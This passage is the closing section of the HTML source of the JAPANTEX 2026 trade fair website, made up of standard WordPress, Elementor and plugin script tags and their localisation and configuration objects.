trx-addons-post-meta-item-separator,.trx-addons-restaurant-menu-item-wrap,.trx-addons-testimonials-container","elementor_animate_as_text":{"elementor-heading-title":"line,word,char","sc_item_title":"line,word,char","trx-addons-advanced-title-item":"sequental,random,line,word,char","trx-addons-marquee-item":"sequental,random,line,word,char"},"elementor_breakpoints":{"desktop":999999,"tablet":1024,"mobile":767},"elementor_placeholder_image":"https://japantex.jp/wp-content/plugins/elementor/assets/images/placeholder.png","ai_helper_sc_igenerator_openai_sizes":[],"msg_ai_helper_igenerator_download":"Download","msg_ai_helper_igenerator_download_error":"Error","msg_ai_helper_igenerator_download_expired":"The generated image cache timed out. The download link is no longer valid.\u003Cbr\u003EBut you can still download the image by right-clicking on it and selecting \"Save Image As...\"","msg_ai_helper_igenerator_disabled":"Image generation is not available in edit mode!","msg_ai_helper_igenerator_wait_available":"Wait for the image to become available on the rendering server","msg_ai_helper_sc_chat_clear":"Clear","msg_ai_helper_mgenerator_download":"Download","msg_ai_helper_mgenerator_download_error":"Error","msg_ai_helper_mgenerator_download_expired":"The generated music cache timed out. The download link is no longer valid.\u003Cbr\u003EBut you can still download the music by right-clicking on it and selecting \"Save Media As...\"","msg_ai_helper_mgenerator_disabled":"Music generation is not available in edit mode!","msg_ai_helper_mgenerator_fetch_error":"Error updating the tag audio on this page - object is not found!","msg_ai_helper_agenerator_download":"Download","msg_ai_helper_agenerator_download_error":"Error","msg_ai_helper_agenerator_download_expired":"The generated audio cache timed out. The download link is no longer valid.\u003Cbr\u003EBut you can still download the file by right-clicking on it and selecting \"Save Media As...\"","msg_ai_helper_agenerator_disabled":"Audio generation is not available in edit mode!","msg_ai_helper_agenerator_fetch_error":"Error updating the tag audio on this page - object is not found!","msg_ai_helper_vgenerator_download":"Download","msg_ai_helper_vgenerator_download_error":"Error","msg_ai_helper_vgenerator_download_expired":"The generated video cache timed out. The download link is no longer valid.\u003Cbr\u003EBut you can still download the video by right-clicking on it and selecting \"Save Video As...\"","msg_ai_helper_vgenerator_disabled":"Video generation is not available in edit mode!","msg_ai_helper_vgenerator_wait_available":"Wait for the video to become available on the rendering server","ai_helper_vgenerator_models_supporting_keyframes":["lumalabs-ai/ray-2","lumalabs-ai/ray-flash-2"],"ai_helper_vgenerator_models_supporting_duration":["lumalabs-ai/ray-2","lumalabs-ai/ray-flash-2"],"ai_helper_vgenerator_models_supporting_resolution":["lumalabs-ai/ray-2","lumalabs-ai/ray-flash-2"],"msg_sc_googlemap_not_avail":"Googlemap service is not available","msg_sc_googlemap_geocoder_error":"Error while geocode address","msg_sc_osmap_not_avail":"OpenStreetMap service is not available","msg_sc_osmap_geocoder_error":"Error while geocoding address","osmap_tiler":"vector","osmap_tiler_styles":[],"osmap_attribution":"Map data \u00a9 \u003Ca href=\"https://www.openstreetmap.org/\"\u003EOpenStreetMap\u003C/a\u003E contributors","slider_round_lengths":"1"};
- //# sourceURL=trx_addons-js-extra
- /* ]]> */
- </script>
- <script src="https://japantex.jp/wp-content/plugins/trx_addons/js/__scripts.js" id="trx_addons-js"></script>
- <script src="https://japantex.jp/wp-content/plugins/trx_addons/addons/elementor-widgets/assets/frontend.js" id="trx_addons-elementor-widgets-js"></script>
- <script src="https://japantex.jp/wp-content/plugins/trx_addons/components/cpt/layouts/shortcodes/menu/superfish.min.js" id="superfish-js"></script>
- <script src="https://japantex.jp/wp-content/plugins/trx_addons/js/tweenmax/GSAP/3.12.2/gsap.min.js" id="tweenmax-js"></script>
- <script src="https://www.google.com/recaptcha/api.js?render=6LcIbPsqAAAAAJEMjfnrD2gvVsNp9NQ3ZcHBl4-K&ver=3.0" id="google-recaptcha-js"></script>
- <script src="https://japantex.jp/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0" id="wp-polyfill-js"></script>
- <script id="wpcf7-recaptcha-js-before">
- /* <![CDATA[ */
- var wpcf7_recaptcha = {
- "sitekey": "6LcIbPsqAAAAAJEMjfnrD2gvVsNp9NQ3ZcHBl4-K",
- "actions": {
- "homepage": "homepage",
- "contactform": "contactform"
- }
- };
- //# sourceURL=wpcf7-recaptcha-js-before
- /* ]]> */
- </script>
- <script src="https://japantex.jp/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.1.5" id="wpcf7-recaptcha-js"></script>
- <script src="https://japantex.jp/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.35.5" id="elementor-webpack-runtime-js"></script>
- <script src="https://japantex.jp/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.35.5" id="elementor-frontend-modules-js"></script>
- <script src="https://japantex.jp/wp-includes/js/jquery/ui/core.min.js?ver=1.13.3" id="jquery-ui-core-js"></script>
- <script id="elementor-frontend-js-before">
- /* <![CDATA[ */
- var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false,"isScriptDebug":false},"i18n":{"shareOnFacebook":"Facebook \u3067\u5171\u6709","shareOnTwitter":"Twitter \u3067\u5171\u6709","pinIt":"\u30d4\u30f3\u3059\u308b","download":"\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9","downloadImage":"\u753b\u50cf\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9","fullscreen":"\u30d5\u30eb\u30b9\u30af\u30ea\u30fc\u30f3","zoom":"\u30ba\u30fc\u30e0","share":"\u30b7\u30a7\u30a2","playVideo":"\u52d5\u753b\u518d\u751f","previous":"\u524d","next":"\u6b21","close":"\u9589\u3058\u308b","a11yCarouselPrevSlideMessage":"\u524d\u306e\u30b9\u30e9\u30a4\u30c9","a11yCarouselNextSlideMessage":"\u6b21\u306e\u30b9\u30e9\u30a4\u30c9","a11yCarouselFirstSlideMessage":"\u3053\u308c\u304c\u6700\u521d\u306e\u30b9\u30e9\u30a4\u30c9\u3067\u3059","a11yCarouselLastSlideMessage":"\u3053\u308c\u304c\u6700\u5f8c\u306e\u30b9\u30e9\u30a4\u30c9\u3067\u3059","a11yCarouselPaginationBulletMessage":"\u30b9\u30e9\u30a4\u30c9\u306b\u79fb\u52d5"},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"responsive":{"breakpoints":{"mobile":{"label":"\u30e2\u30d0\u30a4\u30eb\u7e26\u5411\u304d","value":767,"default_value":767,"direction":"max","is_enabled":true},"mobile_extra":{"label":"\u30e2\u30d0\u30a4\u30eb\u6a2a\u5411\u304d","value":880,"default_value":880,"direction":"max","is_enabled":false},"tablet":{"label":"\u30bf\u30d6\u30ec\u30c3\u30c8\u7e26\u30ec\u30a4\u30a2\u30a6\u30c8","value":1024,"default_value":1024,"direction":"max","is_enabled":true},"tablet_extra":{"label":"\u30bf\u30d6\u30ec\u30c3\u30c8\u6a2a\u30ec\u30a4\u30a2\u30a6\u30c8","value":1200,"default_value":1200,"direction":"max","is_enabled":false},"laptop":{"label":"\u30ce\u30fc\u30c8\u30d1\u30bd\u30b3\u30f3","value":1366,"default_value":1366,"direction":"max","is_enabled":false},"widescreen":{"label":"\u30ef\u30a4\u30c9\u30b9\u30af\u30ea\u30fc\u30f3","value":2400,"default_value":2400,"direction":"min","is_enabled":false}},"hasCustomBreakpoints":false},"version":"3.35.5","is_static":false,"experimentalFeatures":{"e_font_icon_svg":true,"additional_custom_breakpoints":true,"container":true,"nested-elements":true,"home_screen":true,"global_classes_should_enforce_capabilities":true,"e_variables":true,"cloud-library":true,"e_opt_in_v4_page":true,"e_components":true,"e_interactions":true,"e_editor_one":true,"import-export-customization":true},"urls":{"assets":"https:\/\/japantex.jp\/wp-content\/plugins\/elementor\/assets\/","ajaxurl":"https:\/\/japantex.jp\/wp-admin\/admin-ajax.php","uploadUrl":"https:\/\/japantex.jp\/wp-content\/uploads"},"nonces":{"floatingButtonsClickTracking":"d469498405"},"swiperClass":"swiper","settings":{"page":[],"editorPreferences":[]},"kit":{"stretched_section_container":".page_wrap","active_breakpoints":["viewport_mobile","viewport_tablet"],"lightbox_enable_counter":"yes","lightbox_enable_fullscreen":"yes","lightbox_enable_zoom":"yes","lightbox_enable_share":"yes","lightbox_title_src":"title","lightbox_description_src":"description"},"post":{"id":20657,"title":"JAPANTEX%202026%EF%BD%9C%E6%97%A5%E6%9C%AC%E6%9C%80%E5%A4%A7%E7%B4%9A%E3%81%AE%E5%9B%BD%E9%9A%9B%E3%82%A4%E3%83%B3%E3%83%86%E3%83%AA%E3%82%A2%E8%A6%8B%E6%9C%AC%E5%B8%82%EF%BC%88%E5%85%AC%E5%BC%8F%EF%BC%89%20%E2%80%93%20%E6%97%A5%E6%9C%AC%E6%9C%80%E5%A4%A7%E7%B4%9A%E3%81%AE%E3%82%A4%E3%83%B3%E3%83%86%E3%83%AA%E3%82%A2%E5%9B%BD%E9%9A%9B%E8%A6%8B%E6%9C%AC%E5%B8%82%E3%80%8CJAPANTEX%202025%E3%80%8D%E3%81%A7%E6%9C%80%E6%96%B0%E3%81%AE%E3%82%A4%E3%83%B3%E3%83%86%E3%83%AA%E3%82%A2%E3%83%88%E3%83%AC%E3%83%B3%E3%83%89%E3%82%92%E4%BD%93%E6%84%9F%E3%80%82%E3%82%AB%E3%83%BC%E3%83%86%E3%83%B3%E3%83%BB%E5%A3%81%E7%B4%99%E3%83%BB%E5%BA%8A%E6%9D%90%E3%81%AA%E3%81%A9%E3%82%92%E5%9B%BD%E5%86%85%E5%A4%96%E3%81%AE%E5%87%BA%E5%B1%95%E8%80%85%E3%81%A8%E7%9B%B4%E6%8E%A5%E5%95%86%E8%AB%87%E3%81%A7%E3%81%8D%E3%82%8B%E6%97%A5%E6%9C%AC%E6%9C%80%E5%A4%A7%E7%B4%9A%E3%81%AE%E5%B1%95%E7%A4%BA%E4%BC%9A%E3%81%A7%E3%81%99%E3%80%82","excerpt":"","featuredImage":false}};
- //# sourceURL=elementor-frontend-js-before
- /* ]]> */
- </script>
- <script src="https://japantex.jp/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.35.5" id="elementor-frontend-js"></script>
- <script src="https://japantex.jp/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-events-provider-contact-form-7-83c32a029ed2cf5b6a82.js" id="googlesitekit-events-provider-contact-form-7-js" defer></script>
- <script id="bite-init-js-extra">
- /* <![CDATA[ */
- var BITE_STORAGE = {"ajax_url":"https://japantex.jp/wp-admin/admin-ajax.php","ajax_nonce":"8ddc3b1ad5","home_url":"https://japantex.jp","theme_url":"https://japantex.jp/wp-content/themes/bite/","site_scheme":"scheme_default","user_logged_in":"","mobile_layout_width":"768","mobile_device":"","mobile_breakpoint_underpanels_off":"768","mobile_breakpoint_fullheight_off":"1025","menu_side_stretch":"","menu_side_icons":"","background_video":"","use_mediaelements":"1","resize_tag_video":"","resize_tag_iframe":"1","open_full_post":"","which_block_load":"article","admin_mode":"","msg_ajax_error":"Invalid server answer!","msg_i_agree_error":"Please accept the terms of our Privacy Policy.","select_container_disabled":"1","alter_link_color":"#A44027"};
- //# sourceURL=bite-init-js-extra
- /* ]]> */
- </script>
- <script src="https://japantex.jp/wp-content/themes/bite/js/__scripts.js" id="bite-init-js"></script>
- <script id="mediaelement-core-js-before">
- /* <![CDATA[ */
- var mejsL10n = {"language":"ja","strings":{"mejs.download-file":"\u30d5\u30a1\u30a4\u30eb\u3092\u30c0\u30a6\u30f3\u30ed\u30fc\u30c9","mejs.install-flash":"\u3054\u5229\u7528\u306e\u30d6\u30e9\u30a6\u30b6\u30fc\u306f Flash Player \u304c\u7121\u52b9\u306b\u306a\u3063\u3066\u3044\u308b\u304b\u3001\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002Flash Player \u30d7\u30e9\u30b0\u30a4\u30f3\u3092\u6709\u52b9\u306b\u3059\u308b\u304b\u3001\u6700\u65b0\u30d0\u30fc\u30b8\u30e7\u30f3\u3092 https://get.adobe.com/jp/flashplayer/ \u304b\u3089\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3057\u3066\u304f\u3060\u3055\u3044\u3002","mejs.fullscreen":"\u30d5\u30eb\u30b9\u30af\u30ea\u30fc\u30f3","mejs.play":"\u518d\u751f","mejs.pause":"\u505c\u6b62","mejs.time-slider":"\u30bf\u30a4\u30e0\u30b9\u30e9\u30a4\u30c0\u30fc","mejs.time-help-text":"1\u79d2\u9032\u3080\u306b\u306f\u5de6\u53f3\u77e2\u5370\u30ad\u30fc\u3092\u300110\u79d2\u9032\u3080\u306b\u306f\u4e0a\u4e0b\u77e2\u5370\u30ad\u30fc\u3092\u4f7f\u3063\u3066\u304f\u3060\u3055\u3044\u3002","mejs.live-broadcast":"\u751f\u653e\u9001","mejs.volume-help-text":"\u30dc\u30ea\u30e5\u30fc\u30e0\u8abf\u7bc0\u306b\u306f\u4e0a\u4e0b\u77e2\u5370\u30ad\u30fc\u3092\u4f7f\u3063\u3066\u304f\u3060\u3055\u3044\u3002","mejs.unmute":"\u30df\u30e5\u30fc\u30c8\u89e3\u9664","mejs.mute":"\u30df\u30e5\u30fc\u30c8","mejs.volume-slider":"\u30dc\u30ea\u30e5\u30fc\u30e0\u30b9\u30e9\u30a4\u30c0\u30fc","mejs.video-player":"\u52d5\u753b\u30d7\u30ec\u30fc\u30e4\u30fc","mejs.audio-player":"\u97f3\u58f0\u30d7\u30ec\u30fc\u30e4\u30fc","mejs.captions-subtitles":"\u30ad\u30e3\u30d7\u30b7\u30e7\u30f3/\u5b57\u5e55","mejs.captions-chapters":"\u30c1\u30e3\u30d7\u30bf\u30fc","mejs.none":"\u306a\u3057","mejs.afrikaans":"\u30a2\u30d5\u30ea\u30ab\u30fc\u30f3\u30b9\u8a9e","mejs.albanian":"\u30a2\u30eb\u30d0\u30cb\u30a2\u8a9e","mejs.arabic":"\u30a2\u30e9\u30d3\u30a2\u8a9e","mejs.belarusian":"\u30d9\u30e9\u30eb\u30fc\u30b7\u8a9e","mejs.bulgarian":"\u30d6\u30eb\u30ac\u30ea\u30a2\u8a9e","mejs.catalan":"\u30ab\u30bf\u30ed\u30cb\u30a2\u8a9e","mejs.chinese":"\u4e2d\u56fd\u8a9e","mejs.chinese-simplified":"\u4e2d\u56fd\u8a9e (\u7c21\u4f53\u5b57)","mejs.chinese-traditional":"\u4e2d\u56fd\u8a9e (\u7e41\u4f53\u5b57)","mejs.croatian":"\u30af\u30ed\u30a2\u30c1\u30a2\u8a9e","mejs.czech":"\u30c1\u30a7\u30b3\u8a9e","mejs.danish":"\u30c7\u30f3\u30de\u30fc\u30af\u8a9e","mejs.dutch":"\u30aa\u30e9\u30f3\u30c0\u8a9e","mejs.english":"\u82f1\u8a9e","mejs.estonian":"\u30a8\u30b9\u30c8\u30cb\u30a2\u8a9e","mejs.filipino":"\u30d5\u30a3\u30ea\u30d4\u30f3\u8a9e","mejs.finnish":"\u30d5\u30a3\u30f3\u30e9\u30f3\u30c9\u8a9e","mejs.french":"\u30d5\u30e9\u30f3\u30b9\u8a9e","mejs.galician":"\u30ac\u30ea\u30b7\u30a2\u8a9e","mejs.german":"\u30c9\u30a4\u30c4\u8a9e","mejs.greek":"\u30ae\u30ea\u30b7\u30e3\u8a9e","mejs.haitian-creole":"\u30cf\u30a4\u30c1\u8a9e","mejs.hebrew":"\u30d8\u30d6\u30e9\u30a4\u8a9e","mejs.hindi":"\u30d2\u30f3\u30c7\u30a3\u30fc\u8a9e","mejs.hungarian":"\u30cf\u30f3\u30ac\u30ea\u30fc\u8a9e","mejs.icelandic":"\u30a2\u30a4\u30b9\u30e9\u30f3\u30c9\u8a9e","mejs.indonesian":"\u30a4\u30f3\u30c9\u30cd\u30b7\u30a2\u8a9e","mejs.irish":"\u30a2\u30a4\u30eb\u30e9\u30f3\u30c9\u8a9e","mejs.italian":"\u30a4\u30bf\u30ea\u30a2\u8a9e","mejs.japanese":"\u65e5\u672c\u8a9e","mejs.korean":"\u97d3\u56fd\u8a9e","mejs.latvian":"\u30e9\u30c8\u30d3\u30a2\u8a9e","mejs.lithuanian":"\u30ea\u30c8\u30a2\u30cb\u30a2\u8a9e","mejs.macedonian":"\u30de\u30b1\u30c9\u30cb\u30a2\u8a9e","mejs.malay":"\u30de\u30ec\u30fc\u8a9e","mejs.maltese":"\u30de\u30eb\u30bf\u8a9e","mejs.norwegian":"\u30ce\u30eb\u30a6\u30a7\u30fc\u8a9e","mejs.persian":"\u30da\u30eb\u30b7\u30a2\u8a9e","mejs.polish":"\u30dd\u30fc\u30e9\u30f3\u30c9\u8a9e","mejs.portuguese":"\u30dd\u30eb\u30c8\u30ac\u30eb\u8a9e","mejs.romanian":"\u30eb\u30fc\u30de\u30cb\u30a2\u8a9e","mejs.russian":"\u30ed\u30b7\u30a2\u8a9e","mejs.serbian":"\u30bb\u30eb\u30d3\u30a2\u8a9e","mejs.slovak":"\u30b9\u30ed\u30d0\u30ad\u30a2\u8a9e","mejs.slovenian":"\u30b9\u30ed\u30d9\u30cb\u30a2\u8a9e","mejs.spanish":"\u30b9\u30da\u30a4\u30f3\u8a9e","mejs.swahili":"\u30b9\u30ef\u30d2\u30ea\u8a9e","mejs.swedish":"\u30b9\u30a6\u30a7\u30fc\u30c7\u30f3\u8a9e","mejs.tagalog":"\u30bf\u30ac\u30ed\u30b0\u8a9e","mejs.thai":"\u30bf\u30a4\u8a9e","mejs.turkish":"\u30c8\u30eb\u30b3\u8a9e","mejs.ukrainian":"\u30a6\u30af\u30e9\u30a4\u30ca\u8a9e","mejs.vietnamese":"\u30d9\u30c8\u30ca\u30e0\u8a9e","mejs.welsh":"\u30a6\u30a7\u30fc\u30eb\u30ba\u8a9e","mejs.yiddish":"\u30a4\u30c7\u30a3\u30c3\u30b7\u30e5\u8a9e"}};
- //# sourceURL=mediaelement-core-js-before
- /* ]]> */
- </script>
- <script src="https://japantex.jp/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.17" id="mediaelement-core-js"></script>
- <script src="https://japantex.jp/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=6.9.1" id="mediaelement-migrate-js"></script>
- <script id="mediaelement-js-extra">
- /* <![CDATA[ */
- var _wpmejsSettings = {"pluginPath":"/wp-includes/js/mediaelement/","classPrefix":"mejs-","stretching":"responsive","audioShortcodeLibrary":"mediaelement","videoShortcodeLibrary":"mediaelement"};
- //# sourceURL=mediaelement-js-extra
- /* ]]> */
- </script>
- <script src="https://japantex.jp/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=6.9.1" id="wp-mediaelement-js"></script>
- <script src="https://japantex.jp/wp-content/themes/bite/skins/default/skin.js" id="bite-skin-default-js"></script>
- <script id="wp-emoji-settings" type="application/json">
- {"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://japantex.jp/wp-includes/js/wp-emoji-release.min.js?ver=6.9.1"}}
- </script>
- <script type="module">
- /* <![CDATA[ */
- /*! This file is auto-generated */
- const a=JSON.parse(document.getElementById("wp-emoji-settings").textContent),o=(window._wpemojiSettings=a,"wpEmojiSettingsSupports"),s=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const a=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===a[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,a){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!a(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,a){let r;const o=(r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),s=(o.textBaseline="top",o.font="600 32px Arial",{});return e.forEach(e=>{s[e]=t(o,e,n,a)}),s}function r(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}a.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),c.toString(),p.toString()].join(",")+"));",a=new Blob([e],{type:"text/javascript"});const r=new Worker(URL.createObjectURL(a),{name:"wpTestEmojiSupports"});return void(r.onmessage=e=>{i(n=e.data),r.terminate(),t(n)})}catch(e){}i(n=f(s,u,c,p))}t(n)}).then(e=>{for(const n in e)a.supports[n]=e[n],a.supports.everything=a.supports.everything&&a.supports[n],"flag"!==n&&(a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&a.supports[n]);var t;a.supports.everythingExceptFlag=a.supports.everythingExceptFlag&&!a.supports.flag,a.supports.everything||((t=a.source||{}).concatemoji?r(t.concatemoji):t.wpemoji&&t.twemoji&&(r(t.twemoji),r(t.wpemoji)))});
- //# sourceURL=https://japantex.jp/wp-includes/js/wp-emoji-loader.min.js
- /* ]]> */
- </script>
- <script defer src="https://static.cloudflareinsights.com/beacon.min.js/v8c78df7c7c0f484497ecbca7046644da1771523124516" integrity="sha512-8DS7rgIrAmghBFwoOTujcf6D9rXvH8xm8JQ1Ja01h9QX8EzXldiszufYa4IFfKdLUKTTrnSFXLDkUEOTrZQ8Qg==" data-cf-beacon='{"version":"2024.11.0","token":"410808f3fd374db6a20e00fe3228046b","r":1,"server_timing":{"name":{"cfCacheStatus":true,"cfEdge":true,"cfExtPri":true,"cfL4":true,"cfOrigin":true,"cfSpeedBrain":true},"location_startswith":null}}' crossorigin="anonymous"></script>
- </body>
- </html>
